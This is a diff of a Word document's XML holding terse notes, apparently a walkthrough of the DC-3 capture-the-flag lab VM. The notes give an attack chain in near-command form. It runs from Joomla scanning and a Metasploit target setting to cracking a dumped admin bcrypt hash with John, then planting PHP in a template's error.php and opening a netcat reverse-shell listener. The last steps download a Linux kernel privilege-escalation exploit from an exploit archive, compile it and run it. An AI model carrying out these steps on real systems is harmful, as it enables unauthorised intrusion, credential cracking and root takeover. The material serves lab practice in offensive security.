--- a/VM/9.DC3.docx
+++ b/VM/9.DC3.docx
@@ -1,10 +1,25 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
   <w:body>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Joomscan –url </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Joomscan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>http://</w:t>
@@ -29,8 +44,13 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>set RHOST 10.255.254.73</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>set</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> RHOST 10.255.254.73</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -80,7 +100,90 @@
           <w:rStyle w:val="Hyperlink"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>'admin', 'freddy@norealaddress.net', '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu', '', '']</w:t>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>admin</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>', 'freddy@norealaddress.net', $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>CVRnGeZsVJwR0kWFlfB1Zu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>Echo ‘</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>$2y$10$</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>DpfpYjADpejngxNh9GnmCeyIHCWpL97</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>CVRnGeZsVJwR0kWFlfB1Zu’  &gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>John hash</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -105,6 +208,7 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
@@ -112,6 +216,7 @@
         </w:rPr>
         <w:t>username</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
@@ -127,6 +232,7 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
@@ -148,6 +254,7 @@
         </w:rPr>
         <w:t>snoopy</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -176,38 +283,115 @@
           <w:rStyle w:val="Hyperlink"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>Go to templates then templates then protostar</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>Edit error.php</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>past php in error.php</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Go to templates then templates then </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>protostar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Edit </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>error.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  or</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>index.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>past</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>error.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
@@ -223,27 +407,154 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t>192.168.1.213/templates/protostar/error.php</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-        <w:t xml:space="preserve">find exploit by </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>lvnp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1337</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>192.168.1.213/templates/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>protostar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>error.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">or </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>192.168.1.213</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>index.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>find</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit by </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -260,6 +571,24 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>linux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
@@ -279,21 +608,151 @@
           <w:rStyle w:val="Hyperlink"/>
           <w:color w:val="auto"/>
         </w:rPr>
-        <w:t>Cd /tmp ( any user can perform in this directory)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+        <w:t>Cd /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>( any</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> user can perform in this directory)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F5F2F0"/>
+        <w:spacing w:before="120" w:after="120"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>W</w:t>
       </w:r>
       <w:r>
         <w:t>get</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>tar -xvf exploit.tar</w:t>
-      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId5" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          </w:rPr>
+          <w:t>https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      (from the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>dbexploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>tar</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xvf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> exploit.tar</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>cd</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ebpf_mapfd_doubleput_exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>./</w:t>
+      </w:r>
+      <w:r>
+        <w:t>compile.sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>./</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>doubleput</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
@@ -306,7 +765,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -322,7 +781,7 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="371">
     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
     <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
@@ -694,11 +1153,6 @@
     <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
     <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
     <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -742,7 +1196,7 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="UnresolvedMention">
+  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
     <w:name w:val="Unresolved Mention"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:uiPriority w:val="99"/>
@@ -752,6 +1206,67 @@
     <w:rPr>
       <w:color w:val="605E5C"/>
       <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HTMLPreformattedChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="005431C7"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="left" w:pos="916"/>
+        <w:tab w:val="left" w:pos="1832"/>
+        <w:tab w:val="left" w:pos="2748"/>
+        <w:tab w:val="left" w:pos="3664"/>
+        <w:tab w:val="left" w:pos="4580"/>
+        <w:tab w:val="left" w:pos="5496"/>
+        <w:tab w:val="left" w:pos="6412"/>
+        <w:tab w:val="left" w:pos="7328"/>
+        <w:tab w:val="left" w:pos="8244"/>
+        <w:tab w:val="left" w:pos="9160"/>
+        <w:tab w:val="left" w:pos="10076"/>
+        <w:tab w:val="left" w:pos="10992"/>
+        <w:tab w:val="left" w:pos="11908"/>
+        <w:tab w:val="left" w:pos="12824"/>
+        <w:tab w:val="left" w:pos="13740"/>
+        <w:tab w:val="left" w:pos="14656"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
+    <w:name w:val="HTML Preformatted Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="HTMLPreformatted"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="005431C7"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="HTMLCode">
+    <w:name w:val="HTML Code"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="005431C7"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
 </w:styles>
